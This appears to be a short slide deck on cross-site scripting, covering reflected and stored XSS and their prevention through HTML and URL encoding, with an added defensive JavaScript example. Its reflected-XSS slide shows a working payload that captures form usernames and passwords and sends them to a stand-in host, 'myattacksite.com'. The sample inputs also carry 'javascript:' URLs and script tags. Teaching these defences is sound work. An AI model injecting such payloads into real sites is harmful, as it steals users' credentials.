XSS

What is XSS

  • Cross-Site Scripting
  • A familiar way to hack
  • Caused by bad habits

Types of XSS

Reflected XSS

document.forms[0].onsubmit = function() {
    var username = document.forms[0]["username"].value;
    var password = document.forms[0]["password"].value;
    var password1 = document.forms[0]["password1"].value;
    var password2 = document.forms[0]["password2"].value;
    var req = new XMLHttpRequest();
    req.open("GET", 'http://myattacksite.com/collector?u='+ username + 
    '&p=' + password + '&p1=' + password1 + '&p2=' + password2, false);
    req.send();
};

HTML Encode:

http://infor.org/no_such_thing.js

→

http%3A%2F%2Finfor.org%2Fno_such_thing.js

Stored XSS

Just post some JavaScript as a comment, and you will find you can do everything

You can use HTML encoding to keep your website from suffering from it

Example

Prevent

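<?php
    // HTML-encode user input before writing it into the response
    echo htmlspecialchars($_GET['something'], ENT_QUOTES, 'UTF-8');
?>
<script>
    // Keep the encoded result; calling encodeURI() alone discards it
    var encoded = encodeURI(fromServer);
</script>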
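
The encoding steps from the Prevent slide, applied to a stored comment, as an added example that is not part of the original slides. The function names (escapeHtml, safeHref, renderComment) and the sample comment are constructed for illustration; each untrusted field is encoded for the place it lands in the page.

```javascript
// Added example (not from the original slides): output encoding per context.
// All function names and the sample comment are constructed for illustration.

// HTML-encode the characters that can break out of text or a quoted attribute.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Accept only http(s) links; encodeURI alone leaves "javascript:" URLs intact.
function safeHref(url) {
  try {
    const parsed = new URL(String(url));
    return parsed.protocol === "http:" || parsed.protocol === "https:" ? parsed.href : "#";
  } catch (e) {
    return "#"; // not an absolute URL: drop the link
  }
}

// Render a stored comment: every untrusted field is encoded for its context.
function renderComment(comment) {
  // A value placed inside a query string needs encodeURIComponent.
  const search = "/search?author=" + encodeURIComponent(comment.author);
  return (
    '<div class="comment">' +
    '<a href="' + escapeHtml(safeHref(comment.website)) + '">' + escapeHtml(comment.author) + "</a> " +
    '<a href="' + escapeHtml(search) + '">more</a>' +
    "<p>" + escapeHtml(comment.body) + "</p>" +
    "</div>"
  );
}

// Constructed sample input: a comment carrying markup in every field.
const sample = {
  author: "bob & <b>co</b>",
  website: "javascript:alert(1)",
  body: '<script src="http://infor.org/no_such_thing.js"></script>',
};
console.log(renderComment(sample));
// The percent-encoded URL shown on the slide is what encodeURIComponent produces;
// encodeURI leaves ":" and "/" untouched.
console.log(encodeURIComponent("http://infor.org/no_such_thing.js"));
```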

XSS

By Tommy Chiang
